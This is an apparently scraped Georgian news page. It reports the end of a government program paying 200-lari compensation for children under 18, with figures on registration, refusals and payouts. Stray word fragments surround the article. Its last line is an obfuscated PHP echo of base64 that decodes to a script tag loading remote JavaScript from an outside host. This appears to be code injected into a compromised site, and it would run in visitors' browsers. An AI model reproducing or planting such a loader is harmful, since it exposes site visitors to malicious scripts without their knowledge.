celsiusi
ავერსი საქკაბელი
18 წლამდე ასაკის ბავშვების დახმარების სამთავრობო პროგრამა დასრულდა. როგორც ცნობილია, კომპენსაციის მიმღებ ყველა პირს შესაძლებლობა ჰქონდა, 1 დეკემბრამდე დარეგისტრირებულიყო და მთავრობისგან 200 ლარიანი კომპენსაცია მიეღო.
 
დღეის მდგომარეობით, სულ რეგისტრირებულია 943 289 ბავშვი. აღსანიშნავია, რომ მათ რიცხვში შედის 3 786 ბავშვი, რომლის მშობელმა ან კანონიერმა წარმომადგენელმა კომპენსაციის მიღებაზე უარი თქვა, თუმცა რა იყო უარის თქმის მიზეზი, ამას ჯანდაცვის სამინისტროში არ განმარტავენ.
 
გარდა ამისა, როგორც ჯანდაცვის სამინისტროდან ბმ.გე-ისთვის მოწოდებული ინფორმაციით ირკვევა, ამ დროისთვის თანხა უკვე დაერიცხა 925 224 ბავშვს, ხოლო დარჩენილ 14 279-ს უახლოეს მომავალში, ეტაპობრივად დაერიცხება.
 
პროექტის ფარგლებში, ამ ეტაპზე 185 044 800 ლარია გაცემული.
 
მთავრობის სხვა სოციალური პაკეტებისგან განსხვავებით, აღნიშნული პროგრამა არ გრძელდება. 
1896
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");